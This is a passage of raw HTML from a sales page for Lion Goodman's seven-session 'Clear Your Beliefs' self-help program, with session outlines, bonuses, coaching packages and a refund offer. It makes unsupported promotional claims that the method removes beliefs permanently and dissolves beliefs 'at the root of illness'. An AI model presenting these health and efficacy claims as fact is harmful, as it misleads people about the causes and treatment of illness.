yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\n<p>\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for 